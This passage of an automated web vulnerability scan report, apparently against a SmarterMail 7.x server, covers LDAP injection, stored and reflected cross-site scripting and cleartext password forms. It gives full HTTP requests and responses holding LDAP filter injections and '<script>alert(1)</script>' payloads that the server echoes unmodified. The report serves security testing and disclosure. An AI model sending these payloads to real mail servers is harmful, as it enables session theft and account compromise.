The payloads 5faa0382d747b754)(sn=* and 5faa0382d747b754)!(sn=* were each submitted in the type parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}

Response 1

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:00 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 5204


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   No item has been selecte
...[SNIP]...
<![CDATA[
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x28sn\x253d\x2a'); });
Sys.Application.initialize();
$(function() { SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
//]]>
</script>
</form>
</body>
</html>

Request 2

GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)!(sn=* HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:00 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 5247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   No item has been selecte
...[SNIP]...
<![CDATA[
UpdateSidebarCounts('UserEmail', 0);
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x21\x28sn\x253d\x2a'); });
Sys.Application.initialize();
$(function() { SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
//]]>
</script>
</form>
</body>
</html>


3. Cross-site scripting (stored)

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmToday.aspx

Issue detail

The value of the ctl00%24MPH%24SubjectBox_SettingText request parameter submitted to the URL /Main/Calendar/frmEvent.aspx is copied into the HTML document as plain text between tags at the URL /Main/frmToday.aspx. The payload f5d23<script>alert(1)</script>eb582083b9d was submitted in the ctl00%24MPH%24SubjectBox_SettingText parameter. This input was returned unmodified in a subsequent request for the URL /Main/frmToday.aspx.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

POST /Main/Calendar/frmEvent.aspx?popup=true HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx?popup=true#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}; ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55
Content-Length: 27088

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24BPH%24SaveTextImageButton&ctl00%24TPH%24TabStrip%24SelectedTab=ctl00_TPH_TabStrip_Tab1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24SubjectBox_SettingText=f5d23<script>alert(1)</script>eb582083b9d&ctl00%24MPH%24InviteBox=&ctl00_MPH_InviteBox_ClientState=%7B%22logEntries%22%3A%5B%5D%2C%22value%22%3A%22%22%2C%22text%22%3A%22%22%2C%22enabled%22%3Atrue%7D&ctl00%24MPH%24LocationBox_SettingText=anyt
...[SNIP]...

Request 2

GET /Main/frmToday.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:29:05 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 1294009


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Today Page - hoytllc.
...[SNIP]...
<a href="#" onclick="OpenNewMessage('Calendar/frmEvent.aspx?edit=b0f7be7eec69411b82be79429c806520&returnTo=frmToday', 600,400);">f5d23<script>alert(1)</script>eb582083b9d</a>
...[SNIP]...

4. Cross-site scripting (reflected)
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx [ctl00%24Split%24LP%24SessionKey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Default.aspx

Issue detail

The value of the ctl00%24Split%24LP%24SessionKey request parameter is copied into the HTML document as plain text between tags. The payload 4add0<script>alert(1)</script>2140bd7fb8a was submitted in the ctl00%24Split%24LP%24SessionKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Default.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx#page=L01haW4vZnJtTWVzc2FnZXMuYXNweD91c2VyPWVuZHVzZXImZm9sZGVyPWluYm94Jm1hcHBlZD1mYWxzZSZsZWZ0bmF2PXRydWU_&section=UserEmail&lbh=false
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}
Content-Length: 553

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate&__EVENTARGUMENT=UserContacts%7C%2FMain%2FfrmMessages.aspx%3Fuser%3Denduser%2
...[SNIP]...
3Dtrue&__VIEWSTATE=%2FwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGQAofCuGKRyjE010WA%2FAQKKvJgVAw%3D%3D&ctl00%24Split%24LP%24SessionKey=64620560dff748d598e0b5f7f834d3424add0<script>alert(1)</script>2140bd7fb8a&ctl00%24PageTitle=Inbox%20-%20hoytllc.com%20-%20SmarterMail&ctl00%24PanelLoadedState=%7B%7D&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:46:49 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 24201

13901|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
                   
<div style="display: none">
   <div id="ctl00_Split_LP_ctl01_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' on
...[SNIP]...
', dataSource, -1, 1, 0, NavPreviewPane, 0, ShowContextMenu_ctl00_Split_LP_ctl01_ctl00, DoubleClick, DoDelete, false, 2, '\x7b0\x7d\x20selected\x20items', false, true, '64620560dff748d598e0b5f7f834d3424add0<script>alert(1)</script>2140bd7fb8a', -1, '', '', false, '', [{"min":25,"max":25,"percent":false,"locked":true},{"min":100,"max":400,"percent":false,"locked":false}], '/Main/frmEmptyPreviewOuter.aspx?type=contacts', SMWeb.Services.svcSu
...[SNIP]...

4.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmStoredFiles.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload b4cb8<script>alert(1)</script>e5e03b9ed16c7553d was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Main/frmStoredFiles.aspx?path=b4cb8<script>alert(1)</script>e5e03b9ed16c7553d&ctl00%24ScriptManager1=ctl00%24MPH%24GridUpdatePanel%7Cctl00%24MPH%24UpdateGridButton&__EVENTTARGET=ctl00%24MPH%24UpdateGridButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo%3D&ctl00%24MPH%24uploadValidationToken=98dee8a7f3fc415c919a873e64836960&ctl00%24MPH%24pathField=Root%20Folder%5C&ctl00%24MPH%24userField=euser&ctl00%24MPH%24domainField=hoytllc.com&ctl00_MPH_FilesGrid_HiddenInput=&ctl00_MPH_FilesGrid_HiddenLSR=&p15dkvja301hh2v5q1i3n1vsj11690_0_name=fastdial.net-netsparker.pdf&p15dkvja301hh2v5q1i3n1vsj11690_0_status=done&__ASYNCPOST=true HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
Origin: http://vulnerable.SmarterMail 7.x.host:9998
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserStorage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:14:16 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 11677

626|updatePanel|ctl00_BPH_ButtonUpdatePanel|
           <div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return f
...[SNIP]...
_MPH_FilesGrid_HiddenInput=&ctl00_MPH_FilesGrid_HiddenLSR=&p15dkvja301hh2v5q1i3n1vsj11690_0_name=fastdial.net-netsparker.pdf&p15dkvja301hh2v5q1i3n1vsj11690_0_status=done&__ASYNCPOST=true|75|pageTitle||b4cb8<script>alert(1)</script>e5e03b9ed16c7553d - hoytllc.com - SmarterMail|149|scriptBlock|ScriptPath|/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8
...[SNIP]...

4.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmStoredFiles.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as text between TITLE tags. The payload 99cc2</title><script>alert(1)</script>3111003d311 was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Main/frmStoredFiles.aspx?path=99cc2</title><script>alert(1)</script>3111003d311 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserStorage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:27:36 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 18806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   99cc2</title><script>alert(1)</script>3111003d311 - hoytllc.com - SmarterMail
</title>
...[SNIP]...

4.4. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmStoredFiles.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 4e2dc<script>alert(1)</script>ba99eeeec80 was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Main/frmStoredFiles.aspx?path=4e2dc<script>alert(1)</script>ba99eeeec80 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserStorage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:27:29 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 18699


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   4e2dc<script>alert(1)</s
...[SNIP]...
<div id="PageTitle" class="PageTitleText">
                       4e2dc<script>alert(1)</script>ba99eeeec80
                   </div>
...[SNIP]...

5. Cleartext submission of password
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Login.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:18:49 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7968


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<body class="Login" dir="ltr">
   <form method="post" action="Login.aspx" id="aspnetForm">
<div>
...[SNIP]...
</div>
       <input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
   </div>
...[SNIP]...

5.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmChangePasswordWizard.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmChangePasswordWizard.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /Main/frmChangePasswordWizard.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:09 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8230
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<body class="Wizard" dir="ltr">
   <form method="post" action="frmChangePasswordWizard.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td id="ctl00_MPH_txtOldPassword_Setting" class="Setting"><input name="ctl00$MPH$txtOldPassword_SettingText" type="password" id="ctl00_MPH_txtOldPassword_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...
<td id="ctl00_MPH_txtNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtNewPassword_SettingText" type="password" id="ctl00_MPH_txtNewPassword_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...
<td id="ctl00_MPH_txtConfNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtConfNewPassword_SettingText" type="password" id="ctl00_MPH_txtConfNewPassword_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...

5.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMySettings.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmMySettings.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /Main/frmMySettings.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:21:34 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 56951


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Account Settings - hoytl
...[SNIP]...
<body class="" dir="ltr">
   <form method="post" action="frmMySettings.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td id="ctl00_MPH_wucUserSettings_txtChangePassword_CurrentPassword_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtChangePassword_CurrentPassword_SettingText" type="password" id="ctl00_MPH_wucUserSettings_txtChangePassword_CurrentPassword_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...
<td id="ctl00_MPH_wucUserSettings_txtNP_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtNP_SettingText" type="password" id="ctl00_MPH_wucUserSettings_txtNP_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...
